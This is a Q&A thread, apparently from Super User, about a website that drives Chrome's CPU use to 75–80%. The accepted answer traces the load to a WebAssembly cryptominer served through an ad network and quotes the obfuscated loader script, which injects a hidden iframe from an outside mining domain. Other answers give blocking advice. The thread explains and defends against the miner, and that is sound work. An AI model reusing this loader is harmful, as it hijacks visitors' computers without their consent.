# Chrome uses 80% CPU when I visit a specific website

Tags: windows-10, google-chrome, cpu

Whenever I try to visit this particular website, chrome CPU usage shoots up to at least 75% and my laptop get way louder. If I close the tab everything goes back to normal.

[image: Windows Task Manager CPU usage]

[image: Chrome Task Manager CPU Usage]

RAM usage never goes up. My naive guess is the website is trying to mine cryptocurrency. But I this happens only if I use Chrome, Edge works normally when I visit this website. The website in question is `www.123telugu.com`. What could be the reason for this behavior?

Comment: Im using Chrome and my CPU usage  doesnt change on the site.  Im guessing the issue is local to your PC, not the site.

Comment: Yeah, that was my second guess. What could be the issue here?

Comment: Being a risky fellow, I visited that site with firefox. That specific tab kicked my CPU to 65% instantly, which is almost how quickly I closed the tab.

Comment: What happens if I click those links? It borrows my computer for a bit, or now I have malware?

Comment: about the cryptocurrency miner...in a comment to [another SE posting](https://apple.stackexchange.com/questions/317786/how-to-stress-a-macbook-pro-retina) someone was making a similar claim regarding weather.com

Comment: You can test if its miner with https://github.com/stevespringett/disable-webassembly

Comment: I went to that site and same happened so its probably a crypto miner

Comment: "Is it a cryptocurrency miner?" It's *always* a crypto miner.

Comment: Free advert to visit the site :)

Answer (score 117, accepted):

Yes, it’s a crypto currency miner. Hosted at `www.datasecu.download`, implemented in Web Assembly, communicating with its host via Websocket:

[image]

It’s distributed using a compromised advertising network:

Extract from https://s3.amazonaws.com/23ap.com/nodejs/sq9/sq_v2.js

```
var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);
```

tl;dr: Use an Adblocker already.

Comment: Hmm. uBlock Origin doesn't stop it (on Firefox at least).

Comment: [Virustotal](https://www.virustotal.com/#/url/6e62206bfca4ed0d0059aca4534cae00c2ce2c559a6317f14c5c536833a158e4/detection) comes back clean. Does no one classify crypto currency miners on websites as malicious?

Comment: heh, that ad network might not even be "compromised", except intentionally.

Comment: @Ploni there are some causes where their use isn't malicious and actually legitimate

Comment: ABP doesn't appear to block it either.

Comment: In the meanwhile, try https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl

Comment: @DanielB: I need to set both "third-party scripts" and "third-party frames" to *neutral* for the adware/malware to work. I have them blocked by default.

Comment: @DavidFoerster Those are certainly sensible choices. However, this isn’t the default configuration, leaving many users vulnerable. That’s why it has to be in the default block lists.

Comment: I just added `www.datasecu.download` to my adblock filters and it blocks it now. Thanks.

Comment: Semi-deobusficated version available at https://pastebin.com/6Ys3ihkJ (in a Pastebin because it was otherwise too long)

Comment: @RonJohn I'd argue that cryptocurrency malware isn't that bad, at least compared to [getting Forbes'd](https://www.techdirt.com/articles/20160111/05574633295/forbes-site-after-begging-you-turn-off-adblocker-serves-up-steaming-pile-malware-ads.shtml). I'd rather have my CPU overused for a couple of minutes than malware installed on my computer. Not at all coincidentally, both are prevented by (a) having a strict adblocker and (b) refusing to make exceptions.

Comment: @Ploni Crypto miners are no more malicious than your printed newspaper ad. One taps processing power of your CPU, the other taps processing power of your brain, both do it for the financial gain of its operator. You can close both by closing the page, therefore: "not malicious."

Comment: **Do keep in mind that comments are not for extended discussion.** You might want to take the question of whether crypto mining in ads is malicious to [chat].

Comment: @Agent_L that's debatable, what if someone knew how to access and use your brain without you knowing about it. At least you'd like to know what they are doing. In this case, no warning whatsoever was provided.

Answer (score 9):

For ublock you can load the noCoin filter list: https://github.com/hoshsadiq/adblock-nocoin-list/

This datasecu website is already included.

Answer (score 2):

Just disable javascript and the website won't be able to use your pc's cpu. If you use chrome.
Right click -> inspect element -> network (tab) -> settings -> disable javascript.